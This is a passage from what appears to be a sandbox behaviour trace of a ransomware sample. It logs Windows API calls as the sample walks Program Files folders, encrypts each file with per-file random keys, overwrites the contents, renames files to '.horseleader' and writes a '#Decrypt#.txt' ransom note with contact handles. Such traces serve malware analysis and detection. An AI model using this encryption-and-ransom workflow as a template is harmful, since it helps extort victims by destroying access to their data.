hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.721] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x25968, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.722] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.723] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.723] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.724] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.724] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.724] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.724] CloseHandle (hObject=0x158) returned 1 [0245.724] GetProcessHeap () returned 0x780000 [0245.724] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.724] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE.horseleader") returned 84 [0245.724] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe.horseleader")) returned 1 [0245.725] GetProcessHeap () returned 0x780000 [0245.725] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.725] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfcedc00, ftCreationTime.dwHighDateTime=0x1ca911d, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xcfcedc00, ftLastWriteTime.dwHighDateTime=0x1ca911d, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSE.EXE", cAlternateFileName="")) returned 0 [0245.726] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0245.726] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\#Decrypt#.txt") returned 78 [0245.726] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0245.726] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0245.727] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0245.728] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0245.728] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0245.728] CloseHandle (hObject=0x21c) returned 1 [0245.728] GetProcessHeap () returned 0x780000 [0245.728] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0245.728] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e177d26, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e177d26, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0245.728] lstrcmpiW (lpString1="Stationery", lpString2="Windows") returned -1 [0245.728] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery") returned 61 [0245.728] lstrcmpW (lpString1="Stationery", lpString2=".") returned 1 [0245.728] lstrcmpW (lpString1="Stationery", lpString2="..") returned 1 [0245.728] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.728] GetProcessHeap () returned 0x780000 [0245.728] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0245.729] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*") returned 63 [0245.729] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e177d26, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e177d26, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0245.732] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.732] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\.") returned 63 [0245.732] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.732] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e177d26, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e177d26, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0245.733] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.733] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\..") returned 64 [0245.733] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.733] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.733] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2608de, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2608de, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xcdfff30e, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xff, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Bears.htm", cAlternateFileName="")) returned 1 [0245.733] lstrcmpiW (lpString1="Bears.htm", lpString2="Windows") returned -1 [0245.733] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 71 [0245.733] StrStrIW (lpFirst="Bears.htm", lpSrch=".horseleader") returned 0x0 [0245.733] lstrcmpW (lpString1="Bears.htm", lpString2="#Decrypt#.txt") returned 1 [0245.733] lstrcmpW (lpString1="Bears.htm", lpString2="_uninstalling_.png") returned 1 [0245.733] lstrlenW (lpString=".testttjffg") returned 11 [0245.734] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm", lpSrch=".testttjffg") returned 0x0 [0245.734] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.734] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.734] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.734] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2acb98, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2acb98, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa352261, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Bears.jpg", cAlternateFileName="")) returned 1 [0245.734] lstrcmpiW (lpString1="Bears.jpg", lpString2="Windows") returned -1 [0245.734] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 71 [0245.734] StrStrIW (lpFirst="Bears.jpg", lpSrch=".horseleader") returned 0x0 [0245.734] lstrcmpW (lpString1="Bears.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.735] lstrcmpW (lpString1="Bears.jpg", lpString2="_uninstalling_.png") returned 1 [0245.735] lstrlenW (lpString=".testttjffg") returned 11 [0245.735] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg", lpSrch=".testttjffg") returned 0x0 [0245.735] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.735] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.735] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.735] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4ca9e3b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4ca9e3b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4421c165, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa0f, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Blue_Gradient.jpg", cAlternateFileName="")) returned 1 [0245.735] lstrcmpiW (lpString1="Blue_Gradient.jpg", lpString2="Windows") returned -1 [0245.735] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 79 [0245.735] StrStrIW (lpFirst="Blue_Gradient.jpg", lpSrch=".horseleader") returned 0x0 [0245.735] lstrcmpW (lpString1="Blue_Gradient.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.735] lstrcmpW (lpString1="Blue_Gradient.jpg", lpString2="_uninstalling_.png") returned 1 [0245.735] lstrlenW (lpString=".testttjffg") returned 11 [0245.735] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", lpSrch=".testttjffg") returned 0x0 [0245.735] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.736] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.736] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.737] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4ccff98, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4ccff98, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x442422c3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x11eb, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Cave_Drawings.gif", cAlternateFileName="")) returned 1 [0245.737] lstrcmpiW (lpString1="Cave_Drawings.gif", lpString2="Windows") returned -1 [0245.737] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 79 [0245.737] StrStrIW (lpFirst="Cave_Drawings.gif", lpSrch=".horseleader") returned 0x0 [0245.737] lstrcmpW (lpString1="Cave_Drawings.gif", lpString2="#Decrypt#.txt") returned 1 [0245.737] lstrcmpW (lpString1="Cave_Drawings.gif", lpString2="_uninstalling_.png") returned 1 [0245.737] lstrlenW (lpString=".testttjffg") returned 11 [0245.737] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif", lpSrch=".testttjffg") returned 0x0 [0245.737] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.737] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.738] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.738] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4d6850c, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4d6850c, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4434cc55, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x90f, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Connectivity.gif", cAlternateFileName="")) returned 1 [0245.738] lstrcmpiW (lpString1="Connectivity.gif", lpString2="Windows") returned -1 [0245.738] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 78 [0245.738] StrStrIW (lpFirst="Connectivity.gif", lpSrch=".horseleader") returned 0x0 [0245.738] lstrcmpW (lpString1="Connectivity.gif", lpString2="#Decrypt#.txt") returned 1 [0245.738] lstrcmpW (lpString1="Connectivity.gif", lpString2="_uninstalling_.png") returned 1 [0245.738] lstrlenW (lpString=".testttjffg") returned 11 [0245.738] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif", lpSrch=".testttjffg") returned 0x0 [0245.738] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.738] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.738] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.738] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x80425158, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bf1d2d9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bf1d2d9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x285, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0245.739] lstrcmpiW (lpString1="Desktop.ini", lpString2="Windows") returned -1 [0245.739] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 73 [0245.739] StrStrIW (lpFirst="Desktop.ini", lpSrch=".horseleader") returned 0x0 [0245.739] lstrcmpW (lpString1="Desktop.ini", lpString2="#Decrypt#.txt") returned 1 [0245.739] lstrcmpW (lpString1="Desktop.ini", lpString2="_uninstalling_.png") returned 1 [0245.739] lstrlenW (lpString=".testttjffg") returned 11 [0245.739] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini", lpSrch=".testttjffg") returned 0x0 [0245.739] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.739] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.739] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.740] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 73 [0245.740] StrStrW (lpFirst="Desktop.ini", lpSrch=".txt") returned 0x0 [0245.740] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=645) returned 1 [0245.740] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x285, lpOverlapped=0x0) returned 1 [0245.741] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffd7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.743] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x285, lpOverlapped=0x0) returned 1 [0245.744] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.744] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.744] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.744] CloseHandle (hObject=0x158) returned 1 [0245.745] GetProcessHeap () returned 0x780000 [0245.745] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.745] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.horseleader") returned 85 [0245.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.horseleader")) returned 1 [0245.746] GetProcessHeap () returned 0x780000 [0245.746] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.746] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5015d96, 